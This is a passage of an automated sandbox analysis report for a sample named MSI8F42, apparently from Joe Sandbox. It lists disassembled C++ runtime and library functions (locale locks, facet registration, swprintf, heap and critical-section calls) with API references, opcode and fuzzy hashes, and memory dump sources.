                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 52861adc732268eb6fe7d0664306ea1b3d22ecb1411182ab193fc25e8b3ff56f
                                                                                                                                            • Instruction ID: 4b86b46dfd872dfdbd09d147f86901215f3151d2b96890d0cad09cd1a7e8a7d3
                                                                                                                                            • Opcode Fuzzy Hash: 52861adc732268eb6fe7d0664306ea1b3d22ecb1411182ab193fc25e8b3ff56f
                                                                                                                                            • Instruction Fuzzy Hash: 9401D236901119DBCB1BEB64C865ABEB7B5BF94710F250909F914AF2D1CF309E41CB91
                                                                                                                                            Function 00302E9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302EA5
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302EAF
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302F00
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302F20
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 1c9430cb8b03add1441d23357fd96a1e96d3bb7abf2640a43c60e5969c3b79e0
                                                                                                                                            • Instruction ID: c8e84fd4ba1e5d3a5dc3a25f644807e5e7a8fb6e8657937907075efca4febcde
                                                                                                                                            • Opcode Fuzzy Hash: 1c9430cb8b03add1441d23357fd96a1e96d3bb7abf2640a43c60e5969c3b79e0
                                                                                                                                            • Instruction Fuzzy Hash: E601D23590111AABCB0BEB64D865BBEB7B4BF84710F250819F910AF2D2CF309E01CB91
                                                                                                                                            Function 00302F33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302F3A
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302F44
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302F95
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302FB5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 90b86e91450585db5a43e081d43540659aaa8c81a28a4eb9fb8ef53097fdaa83
                                                                                                                                            • Instruction ID: 7f557b70bc60732d40743ea5c071c5384716840e1c958858037d6fe08063e9a6
                                                                                                                                            • Opcode Fuzzy Hash: 90b86e91450585db5a43e081d43540659aaa8c81a28a4eb9fb8ef53097fdaa83
                                                                                                                                            • Instruction Fuzzy Hash: 4F01D23591251ADBCB1BEB60C865ABEB7B5BF84750F250809F900AF2D1CF309E41CB91
                                                                                                                                            Function 00312D20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SleepConditionVariableCS.KERNELBASE(?,00312CBD,00000064), ref: 00312D43
                                                                                                                                            • LeaveCriticalSection.KERNEL32(0034DD3C,?,?,00312CBD,00000064,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312D4D
                                                                                                                                            • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00312CBD,00000064,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312D5E
                                                                                                                                            • EnterCriticalSection.KERNEL32(0034DD3C,?,00312CBD,00000064,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312D65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3269011525-1316489359
                                                                                                                                            • Opcode ID: c069a331ae13b8df49ebf699d6f3c1a2b16351e38c08ca32556840e254e7abce
                                                                                                                                            • Instruction ID: e6a2260e8494ea8965939aa5cdeec33205b915e8ae5324c9acbf6235a1c32c59
                                                                                                                                            • Opcode Fuzzy Hash: c069a331ae13b8df49ebf699d6f3c1a2b16351e38c08ca32556840e254e7abce
                                                                                                                                            • Instruction Fuzzy Hash: 73E0DF36E05128BBCB272B80FC08ACF3F2DEF0AB10F000020F9096A531CB6069608BD1
                                                                                                                                            Function 00326DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00326E40
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00326F01
                                                                                                                                            • __freea.LIBCMT ref: 00326F68
                                                                                                                                              • Part of subcall function 00325BDC: HeapAlloc.KERNEL32(00000000,00000000,A82,?,0032543A,?,00000000,?,00316CE7,00000000,A82,00000000,?,?,?,0032363B), ref: 00325C0E
                                                                                                                                            • __freea.LIBCMT ref: 00326F7D
                                                                                                                                            • __freea.LIBCMT ref: 00326F8D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                            • Opcode ID: 799613a0795a394d3433f72af581da1cfc09b3a8c134a373942a7624d428d505
                                                                                                                                            • Instruction ID: 0d65958bbdbb2998aa2dc61a0456f0aff183cd44ad3e91e7d92acc4d5a105099
                                                                                                                                            • Opcode Fuzzy Hash: 799613a0795a394d3433f72af581da1cfc09b3a8c134a373942a7624d428d505
                                                                                                                                            • Instruction Fuzzy Hash: 91517E7260022AAFEF279F64FD42EAF36A9EF08750F160529FD08DA150E731DC5086A0
                                                                                                                                            Function 002FB8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB8DD
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB900
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB928
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FB98D
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB9B7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 459529453-0
                                                                                                                                            • Opcode ID: 7aaf48cffe1c51aa9353fe836073de160d6aee9a3dd910926cf9aa32009f3c26
                                                                                                                                            • Instruction ID: f92774a09682514232972efb0a91e262769eb55bca7616847445025b8a587f1e
                                                                                                                                            • Opcode Fuzzy Hash: 7aaf48cffe1c51aa9353fe836073de160d6aee9a3dd910926cf9aa32009f3c26
                                                                                                                                            • Instruction Fuzzy Hash: 2D31F035900219DFCB12CF54C990BAEBBB8FF21364F154169EA04AB2A1DB70AE01CF81
                                                                                                                                            Function 00301C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2020259771-0
                                                                                                                                            • Opcode ID: 8be7aea73659476f5373328eb2cfb3c61c200894fb0c899aad15795aa278b2ab
                                                                                                                                            • Instruction ID: f778b2bfbe6b63d6caa50af72d0ef81a874045436d4cd82908d3cbd00572e479
                                                                                                                                            • Opcode Fuzzy Hash: 8be7aea73659476f5373328eb2cfb3c61c200894fb0c899aad15795aa278b2ab
                                                                                                                                            • Instruction Fuzzy Hash: BB119EB1941784BFE721DBA5C891F17B7ECAF05350F080519F645CBA81D2A4FD50C7A5
                                                                                                                                            Function 002FEC87 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 317COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002FEC8E
                                                                                                                                              • Part of subcall function 002FD87C: __EH_prolog3.LIBCMT ref: 002FD883
                                                                                                                                              • Part of subcall function 002FD87C: std::_Lockit::_Lockit.LIBCPMT ref: 002FD88D
                                                                                                                                              • Part of subcall function 002FD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 002FD8FE
                                                                                                                                            • _Find_elem.LIBCPMT ref: 002FEE8A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                            • String ID: 21$0123456789ABCDEFabcdef-+Xx
                                                                                                                                            • API String ID: 2544715827-778032925
                                                                                                                                            • Opcode ID: 7251b7f5640d11e8537074a8e3efe0dfe472491408bdb05b9a44a1fbd188a250
                                                                                                                                            • Instruction ID: e3594b928e241e226f4074771e5b74b5e3df3c896cc950e88860d541b41e0205
                                                                                                                                            • Opcode Fuzzy Hash: 7251b7f5640d11e8537074a8e3efe0dfe472491408bdb05b9a44a1fbd188a250
                                                                                                                                            • Instruction Fuzzy Hash: 5BC1AF30E2428D8ADF26DFA4C550BFCFBB6AF45380F264179E9856B2A3C7209D55CB11
                                                                                                                                            Function 003062BE Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 003062C8
                                                                                                                                              • Part of subcall function 00302D74: __EH_prolog3.LIBCMT ref: 00302D7B
                                                                                                                                              • Part of subcall function 00302D74: std::_Lockit::_Lockit.LIBCPMT ref: 00302D85
                                                                                                                                              • Part of subcall function 00302D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00302DF6
                                                                                                                                            • _Find_elem.LIBCPMT ref: 00306502
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                            • String ID: 21$0123456789ABCDEFabcdef-+Xx
                                                                                                                                            • API String ID: 2544715827-778032925
                                                                                                                                            • Opcode ID: 9d454d8fe9c1328ec719f50e6ae09d7c225e4071555765a5d01f5872e8c91b2a
                                                                                                                                            • Instruction ID: fc9b6fb57ccda8da72a318e08cf8bd0c11152c5cdb40b7e8ce6f82532f5b8fbf
                                                                                                                                            • Opcode Fuzzy Hash: 9d454d8fe9c1328ec719f50e6ae09d7c225e4071555765a5d01f5872e8c91b2a
                                                                                                                                            • Instruction Fuzzy Hash: D7C1B430E062688BDF26DF64C8627ADBBB1BF51304F454099E885AB2CBDB348D95CB50
                                                                                                                                            Function 00306694 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030669E
                                                                                                                                              • Part of subcall function 002FB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 002FB8DD
                                                                                                                                              • Part of subcall function 002FB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 002FB900
                                                                                                                                              • Part of subcall function 002FB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 002FB928
                                                                                                                                              • Part of subcall function 002FB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 002FB9B7
                                                                                                                                            • _Find_elem.LIBCPMT ref: 003068D8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                            • String ID: 21$0123456789ABCDEFabcdef-+Xx
                                                                                                                                            • API String ID: 3042121994-778032925
                                                                                                                                            • Opcode ID: 0116d987eb4d82226a80dced5cbc3c229072ed591c58dbb78bfbe09bd2def5df
                                                                                                                                            • Instruction ID: 42afd0f9a48cece718c0f4e5127f1d65f746191c76433b08d0ce27ff42113793
                                                                                                                                            • Opcode Fuzzy Hash: 0116d987eb4d82226a80dced5cbc3c229072ed591c58dbb78bfbe09bd2def5df
                                                                                                                                            • Instruction Fuzzy Hash: A2C1C670E062588FDF26DF64C8627BDBBB2BF41304F558099D885AB2CADB348D95CB50
                                                                                                                                            Function 002FBB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000018,7642E7B1,?,00000000), ref: 002FBBA3
                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 002FBD7F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                            • String ID: false$true
                                                                                                                                            • API String ID: 3924972193-2658103896
                                                                                                                                            • Opcode ID: eb169c8db4654a405d1fe4eb94d59b934dced8d2f29aa2ef17f25fceb27e3f67
                                                                                                                                            • Instruction ID: 9b1cfe84486f42ac54aa0a2a04131b0940b20fa065e762fc35d3435040748b22
                                                                                                                                            • Opcode Fuzzy Hash: eb169c8db4654a405d1fe4eb94d59b934dced8d2f29aa2ef17f25fceb27e3f67
                                                                                                                                            • Instruction Fuzzy Hash: 1361ADB1D0034C9BDB11DFA4C941BEEFBF8BF18704F14426AE945AB281E775AA44CB91
                                                                                                                                            Function 0030D4FA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030D501
                                                                                                                                            • _swprintf.LIBCMT ref: 0030D573
                                                                                                                                              • Part of subcall function 0030254E: __EH_prolog3.LIBCMT ref: 00302555
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::_Lockit.LIBCPMT ref: 0030255F
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::~_Lockit.LIBCPMT ref: 003025D0
                                                                                                                                              • Part of subcall function 00302FC8: __EH_prolog3.LIBCMT ref: 00302FCF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                            • String ID: 21$%.0Lf
                                                                                                                                            • API String ID: 3050236999-3009182331
                                                                                                                                            • Opcode ID: 2c25b0ef3c09907d30e04202ba7812c8fc452ea206c02003e80deebe0156d8be
                                                                                                                                            • Instruction ID: ccd443571afc4ad33c0515cddee730341e15ab334e5666ed8e2b02fe2774cbec
                                                                                                                                            • Opcode Fuzzy Hash: 2c25b0ef3c09907d30e04202ba7812c8fc452ea206c02003e80deebe0156d8be
                                                                                                                                            • Instruction Fuzzy Hash: 4E414A71D01308ABCF06DFE0CC55AEDBBB9FB09304F204459E846AB295DB359915CF90
                                                                                                                                            Function 0030D79E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030D7A5
                                                                                                                                            • _swprintf.LIBCMT ref: 0030D817
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8657
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8679
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F86A1
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F880E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                            • String ID: 21$%.0Lf
                                                                                                                                            • API String ID: 1487807907-3009182331
                                                                                                                                            • Opcode ID: bf7e9730da38a83484bf154e8314aa7ca8c53e9e36de9d2e5f7c6e348e0dc0dd
                                                                                                                                            • Instruction ID: 42557b34ad22fe5c594c7c0d615e117a94e2cfe2f03e183e5698853de973654b
                                                                                                                                            • Opcode Fuzzy Hash: bf7e9730da38a83484bf154e8314aa7ca8c53e9e36de9d2e5f7c6e348e0dc0dd
                                                                                                                                            • Instruction Fuzzy Hash: 11417B71D10308ABCF06DFE0D855AEDBBB9FF08340F208459E945AB295EB359915CF90
                                                                                                                                            Function 00311887 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0031188E
                                                                                                                                            • _swprintf.LIBCMT ref: 00311900
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92A0
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92C2
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F92EA
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F9422
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                            • String ID: 21$%.0Lf
                                                                                                                                            • API String ID: 1487807907-3009182331
                                                                                                                                            • Opcode ID: b7fff9219242b032155a7019f4cf6c8f9c47e7b3309031501e87724f80531e7e
                                                                                                                                            • Instruction ID: db3b6f11e9acdcdb01c6dc5d79eb60cd7754bfa2ceb6a6fe4332cc590146fb86
                                                                                                                                            • Opcode Fuzzy Hash: b7fff9219242b032155a7019f4cf6c8f9c47e7b3309031501e87724f80531e7e
                                                                                                                                            • Instruction Fuzzy Hash: 84416A71E1020CABCF0AEFE4C854AEDBBB9FF08340F208459E955AB291DB359955CF90
                                                                                                                                            Function 00308386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030838D
                                                                                                                                              • Part of subcall function 00301C42: _Maklocstr.LIBCPMT ref: 00301C62
